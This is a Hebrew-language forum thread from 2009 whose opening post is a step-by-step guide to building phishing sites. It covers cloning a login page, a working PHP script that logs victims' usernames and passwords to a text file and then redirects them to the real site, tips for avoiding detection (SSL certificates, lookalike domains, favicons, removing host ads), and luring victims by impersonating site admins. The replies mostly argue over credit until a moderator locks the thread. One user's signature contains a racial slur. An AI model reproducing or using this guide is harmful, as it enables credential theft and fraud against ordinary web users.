קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [דיון] הגיבור שלכם מ Fable:The Lost Chapters
    על ידי Jack בפורום תמיכה טכנית במשחקים
    תגובות: 7
    הודעה אחרונה: 07-08-2008, 19:07
  2. תגובות: 18
    הודעה אחרונה: 19-05-2008, 15:49
  3. [דיון]התמונות שלכם מפייבל
    על ידי Ansem בפורום תמיכה טכנית במשחקים
    תגובות: 23
    הודעה אחרונה: 08-09-2005, 18:38
  4. [דיון] אדריאנו החלוץ הכי טוב בעולם?
    על ידי British_Bloke בפורום כדורגל
    תגובות: 30
    הודעה אחרונה: 06-09-2005, 22:59
  5. דיון סמאקדאון 1/9/05
    על ידי Dave Grohl בפורום היאבקות/WWE
    תגובות: 7
    הודעה אחרונה: 06-09-2005, 21:57
נושא נעול
מציג תוצאות 1 עד 14 מתוך 14

[דיון]Phishing

  1. #1
    משתמש ותיק האוואטר של U2tr4x
    שם פרטי
    ::::::::::
    תאריך הצטרפות
    08/2006
    הודעות
    6,259
    לייקים
    1
    נקודות
    1
    משפט מחץ
    sup my nigga?
    מין: זכר

    ברירת מחדל [דיון]Phishing

    Phishing


    אז מה זה בעצם Phishing?

    פישינג זה בעצם אתר שמתחזה לאתר אחר, בדר"כ בשביל לגנוב סיסמאות לחשבונות של אנשים.
    לדוגמא: עשיתי דף פישינג ל-Gmail שדומה ל-Gmail כמו שתי טיפות מים, בכל פעם שיזינו את פרטי החשבון שלהם באתר שעשיתי הססמאות + ה-E-mail שלהם יכתבו לתוך קובץ טקסט.
    שימו לב שלעשות אתר פישינג זה מעשה לא חוקי ועלול להכניס אותכם להרבה צרות.
    השם "phishing" בא מהמילה "fishing" (לדוג), כי מה שאתה בעצם עושה באתר פישינג זה "לדוג" את הסיסמאות של "הקורבנות".
    אתרים שכיחים שעושים להם אתרי פישינג הם: אתרי בנקים, אתרים כמו Paypal\Alertpay ואתרים שהחשבונות של המשתמשים שלהם יכולים להיות מאוד שימושיים.

    ואיך בדיוק אני יוצר אתר Phishing?


    דווקא ליצור אתרי פישניג זה מאוד פשוט.
    • המדריך דורש ידע בסיסי בPHP ובHTML.
    (לצורך הדגמה ניצור דף פישינג לאתר ,"example" אין כזה באמת אתר...O_o.)

    היצירה

    ניכנס לאתר www.example.com\login.php ונעתיק את קוד המקור שלו לקובץ טקסט.
    מי שלא יודע איך לראות את קוד מקור של אתרים אז יכולים לעשות את זה כך:
    בIE:
    הצג --> מקור
    בFF:
    קליק ימיני --> הצג מקור דף

    במקום להעתיק את הקוד מקור אפשר לעשות File > ללחוץ על Save As > לבחור באפשרות השמירה Web Page Complete ולשמור.

    עכשיו פתחו אתר חדש באיזהשהוא איכסון (שבמקרה הזה תומך בPHP) עם אותו שם (example) ופתחו באתר דף בשם login.php,, הדביקו את קוד המקור של הדף www.example.com\login.php באותו דף שלכם, ותשמרו את הדף.

    תיכנסו לדף שעשיתם, הוא נראה בידיוק כמו ?www.example.com\login.php
    אם כן, אתם יכולים לדלג על השורות הבאות.

    אם לא - אתם צריכים לוודא מה לא נראה בדף שעשיתם כמו בדף www.example.com\login.php.
    האם זה קוד ה-CSS או אולי תמונה שלא עובדת במקרה בדף שלכם?
    הפתרון לזה הוא ברוב המקרים פשוט להסתכל בקוד המקור של www.example.com\login.php, אם אתם רואים שהדף לדוגמא מייבא את ה CSS ככה:
    קוד:
    קוד:
    <style type="text/css">
    @import url("/css.css");
    </style>

    או
    קוד:
    קוד:
         <style rel="sylesheet" type="text/css" href="/css.css>
    </style>

    אז למה הCSS לא עובד בדף שלכם?
    התשובה היא בגלל שהאתר מייבא את קובץ ה-CSS מ- css.css/
    מה שאומר שאם הקובץ css.css לא נמצא באותו אכסון שלך ובאותה Dir, אז הוא לא ייבא שום CSS.
    איך פותרים?
    הכי פשוט זה לכתוב בדף שלכם במקום:
    קוד:
    קוד:
    <style rel="sylesheet" type="text/css" href="/css.css>

    </style>
    ככה:
    קוד:
    קוד:
    <style rel="sylesheet" type="text/css" href="www.example.com/css.css>
    </style>

    וככה גם לתמונות וכ'ו.

    עכשיו אנחנו צריכים למצוא את השמות (ID, Name) של התיבות טקסט\סיסמא.
    איך מוצאים?
    מחפשים בקוד המקור של הדף את התגים של תיבת טקסט (Input), וכשמגיעים לתיבת טקסט המבוקשת רואים מה השם שלה
    ורושמים אותו בצד. (ככה לעשות גם לתיבת הסיסמא)
    נניח ושם תיבת הטקסט של שם-המשתמש היא

    A
    ונניח ושם תיבת הסיסמא היא
    B

    נחפש בקוד המקור של www.example.com\login.php את ה-action של ה-form של הסיסמא והשם משתמש.
    נניח ומצאנו אותו וזה הaction שלו:
    קוד HTML:
    <form action="enter.php"
    כעת ניצור עוד דף באתרנו בשם enter.php.
    וגם נעלה לשרת קובץ טקסט בשם passwords.txt.
    ובעצם נכתוב בדף enter.php סקריפט שיכתוב את הפרטים שהמשתמש הזין - לקובץ passwords.txt, ואז יעביר את המשתמש ל-www.example.com\login.php. (האתר האמיתי)
    הסקריפט יראה כך:
    קוד PHP:
    קוד PHP:
    <?php
    $AAA 
    fopen("/passwords.txt""a");
    $User $_REQUEST['A'];
    $Pass $_REQUEST['B'];
    fwrite($AAA"User-name: ");
    fwrite($AAA$User);
    fwrite($AAA"\n");
    fwrite($AAA"Password: ");
    fwrite($AAA$Pass);
    fwrite($AAA"\n");
    fclose($AAA);
    header('Location: www.example.com\login.php');
    ?>
    עכשיו תנסו להזין פרטים לדף הפישינג שלכם ותראו אם הכל עובד כמתוכנן, אם לא - תחזרו אחורה ותנסו למצוא דברים לא נכונים שעשיתם במהלך יצרית האתר.

    אמון

    נניח והכל עובד טוב והאתר שלכם יכול כבר לגנוב פרטים, הגיעה השאלה של האמון.
    אם משתמש יראה שמשהו באתר שלכם הוא לא כמו באתר האמיתי הוא עלול לעזוב את האתר שלכם ואף יותר גרוע - לדווח על האתר!
    אז מה שאנחנו צריכים לעשות הוא לדאוג שהאתר שלכם יראה בידיוק כמו האתר שאתם עושים לו אתר פישינג - איך עושים את זה? תמשיכו לקרוא.
    SSL

    אם האתר שאתם עושים לו אתר פישינג משתמש בSSL, הרי זה מעלה חשדות שבאתר האמיתי יש SSL ובאתר שלכם אין.
    מה עושים?
    קונים הסמכת SSL או שמקבלים אחד בחינם מאתר כמו:
    http://cert.startcom.org/

    URL

    אתם חייבים שלאתר שלכם יהיה שם דומה לאתר האמיתי.
    בגלל זה במדריך פתחנו במדריך הזה אתר בשם www.example.hosting.com.
    אבל זה לא מספיק אמין, אתם צריכים אתר עם Domain!
    איך פותרים?
    או שקונים מהאכסון שלכם חבילה יותר מתקדמת ומקבלים דומיין או "שמסווים" את הURL של האתר שלכם בעזרת אתר שנותן לך לעשות זאת, כמו:
    http://co.cc
    http://www. freedomain . co . nr/
    http://ovh.co.yk
    http:// dot . tk

    Favicon

    יש לאתר שאתם רוצים לעשות לו אתר פישינג Favicon?
    אז זה לא בעיה שלאתר שלך יהיה אותו Favicon.
    אם בקוד המקור שהעתקנו במדריך - יש כבר Favicon, אז אתם לא צריכים לדאוג לסעיף הזה.
    אם אין, תנסו לחפש בגוגל את הFavicon של האתר שאתם רוצים לעשות לו אתר פישינג או שתחפשו בקוד המקור של הדף הראשי של האתר שאתם רוצים לעשות לו אתר פישינג ולחפש שם את הלינק לFavicon שלהם.

    Ads

    רוב האכסונים החינמיים ישימו לכם מודעות משלהם באתר, זה לא טוב לכם... בכלל לא! למה?
    אני יתן לכם לחשוב לבד למה זה לא טוב... [IMG]http://www.***.co.il/images/smilies2/ninja.gif[/IMG]
    איך פותרים?
    קונים חבילת האכסון מתקדמת יותר - בלי מודעות, או - יש אכסונים שאפשר לעקוף את קוד המודעות שלהם בעורמה (לדוגמה: T35)

    איך לפרסם את אתר הפישינג שלי?

    תרשמו את אתרכם למנועי חיפוש, תשלחו הודעות לאנשים כשאתם מתחזים לAdmin של האתר האמיתי ותאמרו שהם צריכים להתחבר מסיבה כלשהיא...
    יש הרבה דרכים.

    איך לא נופלים בפח של אתרי Phishing?

    יש כמעט לכל דפדפן מסנן אתרי-פישינג מובנה.
    יש גם תוספות לפיירפוקס כמו:
    FirePhish Anti-Phishing Extension

    Storage Inspector

    Netcraft Toolbar

    Petname Tool

    PhishTank SiteChecker

    FirePhish Anti-Phishing Extension

    שינסו לסנן אתרי פישינג.

    תמיד תיהיו זהירים לא ללחוץ על לינקים "לאתרי בנק וכ'ו" שאנשים שולחים לכם.
    קרדיט ענק לskyangelxd
    נערך לאחרונה על ידי U2tr4x; 24-04-2009 בשעה 16:59.

  2. קישורים ממומנים

  3. #2
    מנהל האקינג ואבטחת מידע
    משתמש כבוד

    שם פרטי
    יוסי
    תאריך הצטרפות
    02/2004
    גיל
    35
    הודעות
    9,105
    לייקים
    95
    נקודות
    200
    מין: זכר

    ברירת מחדל

    מדריך נחמד, חבל שלא אתה כתבת.
    יש כמה אפשרויות.
    1. שליחת פרטים לאימייל.
    2. שליחת פרטים לדף אינטרנט שאתה מעלה.
    יוסי ברנס | Yossi Baranes
    מתכנת | פיתוח אפליקציות | אבטחת מידע
    HTML.co.il

  4. #3
    משתמש כבוד האוואטר של B1ackSn0w
    שם פרטי
    שחף
    תאריך הצטרפות
    11/2007
    גיל
    33
    הודעות
    10,887
    לייקים
    15
    נקודות
    319
    משפט מחץ
    תעשו אהבה ולא מלחמה קונדום יותר זול מחומר נפץ!
    מין: זכר

    ברירת מחדל

    Thanks, very nice
    נערך לאחרונה על ידי B1ackSn0w; 24-04-2009 בשעה 19:04.
    תכירו את שמוליק, אבא קנה לי

    הוא אוהב במבה, ביסלי ואת עודד מנשה


    ציטוט נכתב במקור על ידי אושרי
    לפני כל יום שהיינו הולכים לישון אבאלה שלי היה בא מרביץ לנו בחורף להריץ דם בגוף כי היה קר זה היה כואב אבל מחמם וגם מרדים

  5. #4
    משתמש ותיק האוואטר של U2tr4x
    שם פרטי
    ::::::::::
    תאריך הצטרפות
    08/2006
    הודעות
    6,259
    לייקים
    1
    נקודות
    1
    משפט מחץ
    sup my nigga?
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי - Yossi - צפיה בהודעה
    מדריך נחמד, חבל שלא אתה כתבת.
    יש כמה אפשרויות.
    1. שליחת פרטים לאימייל.
    2. שליחת פרטים לדף אינטרנט שאתה מעלה.
    תשבע?

  6. #5
    מנהל האקינג ואבטחת מידע
    משתמש כבוד

    שם פרטי
    יוסי
    תאריך הצטרפות
    02/2004
    גיל
    35
    הודעות
    9,105
    לייקים
    95
    נקודות
    200
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי U2tr4x צפיה בהודעה
    תשבע?
    מה אתה משחק אותה מבין.
    אם היית מבין כל כך גדול לא הייתה מעתיק את המדריך מF*P .
    אולי כדי שתתחיל לכתוב מדריכים זה עדיף מאשר להעתיק :|
    יוסי ברנס | Yossi Baranes
    מתכנת | פיתוח אפליקציות | אבטחת מידע
    HTML.co.il

  7. #6
    משתמש ותיק האוואטר של U2tr4x
    שם פרטי
    ::::::::::
    תאריך הצטרפות
    08/2006
    הודעות
    6,259
    לייקים
    1
    נקודות
    1
    משפט מחץ
    sup my nigga?
    מין: זכר

    ברירת מחדל

    סתם ראיתי פורום חדש אז הבאתי לפה משהו נחמד שכולם יבינו.. אין לי כוונה להשקיע בפורום הזה בכלל.. רק נתתי לכם קצת טעימה מPhishing זהו..

  8. #7
    מורחקים
    תאריך הצטרפות
    02/2009
    הודעות
    151
    לייקים
    0
    נקודות
    0
    מין: נקבה

    ברירת מחדל

    "טעימה מ-Phishing" תפסיק לזיין את השכל, מאיפה אתה חושב שיש לך את הזכות להעתיק בכלל מפורום אחר בלי קרדיט?

    בכלל, המדריך המעפן הזה לא שווה כלום, כל אתר שמכבד את עצמו יחסום הזרקות ו-phishing, זאת אומרת שהאתר שלכם ייראה כבעל תוכן פוגע (ללא רישיון ssl) וככה פשוט אף אחד לא ייכנס.

  9. #8
    משתמש כבוד האוואטר של B1ackSn0w
    שם פרטי
    שחף
    תאריך הצטרפות
    11/2007
    גיל
    33
    הודעות
    10,887
    לייקים
    15
    נקודות
    319
    משפט מחץ
    תעשו אהבה ולא מלחמה קונדום יותר זול מחומר נפץ!
    מין: זכר

    ברירת מחדל

    טוב תירגעו, בסך הכל הבנאדם הביא מדריך בכוונה לעזור.
    אם אין לכם כוונה להגיד תודה או לתת הערה בונה אל תגיבו.

    מדריך מצוין
    (גם אם הוא לא שלך)
    תכירו את שמוליק, אבא קנה לי

    הוא אוהב במבה, ביסלי ואת עודד מנשה


    ציטוט נכתב במקור על ידי אושרי
    לפני כל יום שהיינו הולכים לישון אבאלה שלי היה בא מרביץ לנו בחורף להריץ דם בגוף כי היה קר זה היה כואב אבל מחמם וגם מרדים

  10. #9
    משתמש ותיק האוואטר של U2tr4x
    שם פרטי
    ::::::::::
    תאריך הצטרפות
    08/2006
    הודעות
    6,259
    לייקים
    1
    נקודות
    1
    משפט מחץ
    sup my nigga?
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי פשפש במכנסיים צפיה בהודעה
    "טעימה מ-Phishing" תפסיק לזיין את השכל, מאיפה אתה חושב שיש לך את הזכות להעתיק בכלל מפורום אחר בלי קרדיט?

    בכלל, המדריך המעפן הזה לא שווה כלום, כל אתר שמכבד את עצמו יחסום הזרקות ו-phishing, זאת אומרת שהאתר שלכם ייראה כבעל תוכן פוגע (ללא רישיון ssl) וככה פשוט אף אחד לא ייכנס.
    אתה לא ראית ששמתי קרדיט?
    "קרדיט ענק לskyangelxd"
    תקרא לפני שאתה שולל..
    והמדריך הוא לא שלי..

  11. #10
    מורחקים
    תאריך הצטרפות
    02/2009
    הודעות
    151
    לייקים
    0
    נקודות
    0
    מין: נקבה

    ברירת מחדל

    ציטוט נכתב במקור על ידי U2tr4x צפיה בהודעה
    אתה לא ראית ששמתי קרדיט?
    "קרדיט ענק לskyangelxd"
    תקרא לפני שאתה שולל..
    והמדריך הוא לא שלי..
    אל תעשה עלי דאווינים, אתה הוספת את הקרדיט אחר כך, אני ראיתי, וברור שהמדריך לא שלך...

    ואני נותן לך ביקרת בונה, לא להעתיק, או לפחות לתת קרדיט למשתמש ולפורום, כי ככה הוא סתם הורס לו ולפורום את השם..

  12. #11
    משתמש כבוד האוואטר של B1ackSn0w
    שם פרטי
    שחף
    תאריך הצטרפות
    11/2007
    גיל
    33
    הודעות
    10,887
    לייקים
    15
    נקודות
    319
    משפט מחץ
    תעשו אהבה ולא מלחמה קונדום יותר זול מחומר נפץ!
    מין: זכר

    ברירת מחדל

    חבל שאתם לא שמים על מה שאני אומר,
    נעול.
    ופשפש במכנסיים - ראה הוזהרת.
    תכירו את שמוליק, אבא קנה לי

    הוא אוהב במבה, ביסלי ואת עודד מנשה


    ציטוט נכתב במקור על ידי אושרי
    לפני כל יום שהיינו הולכים לישון אבאלה שלי היה בא מרביץ לנו בחורף להריץ דם בגוף כי היה קר זה היה כואב אבל מחמם וגם מרדים

  13. #12
    משתמש מתקדם
    תאריך הצטרפות
    09/2008
    הודעות
    722
    לייקים
    0
    נקודות
    1
    מין: זכר

    ברירת מחדל

    תודה

  14. #13
    משתמש ותיק האוואטר של U2tr4x
    שם פרטי
    ::::::::::
    תאריך הצטרפות
    08/2006
    הודעות
    6,259
    לייקים
    1
    נקודות
    1
    משפט מחץ
    sup my nigga?
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי פשפש במכנסיים צפיה בהודעה
    אל תעשה עלי דאווינים, אתה הוספת את הקרדיט אחר כך, אני ראיתי, וברור שהמדריך לא שלך...

    ואני נותן לך ביקרת בונה, לא להעתיק, או לפחות לתת קרדיט למשתמש ולפורום, כי ככה הוא סתם הורס לו ולפורום את השם..
    תראה מתי ערכתי את ההודעה .. עוד לפני שכתבת שלא נתתי קרדיט ..

  15. #14
    משתמש כבוד האוואטר של B1ackSn0w
    שם פרטי
    שחף
    תאריך הצטרפות
    11/2007
    גיל
    33
    הודעות
    10,887
    לייקים
    15
    נקודות
    319
    משפט מחץ
    תעשו אהבה ולא מלחמה קונדום יותר זול מחומר נפץ!
    מין: זכר

    ברירת מחדל

    חשבתי שנעלתי כאן :|
    נעול, ו- eliranzaga זאת אזהרה בע"פ. אל תספים.
    תכירו את שמוליק, אבא קנה לי

    הוא אוהב במבה, ביסלי ואת עודד מנשה


    ציטוט נכתב במקור על ידי אושרי
    לפני כל יום שהיינו הולכים לישון אבאלה שלי היה בא מרביץ לנו בחורף להריץ דם בגוף כי היה קר זה היה כואב אבל מחמם וגם מרדים

נושא נעול


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 20:31.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,473,167 | הודעות: 8,173,754 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect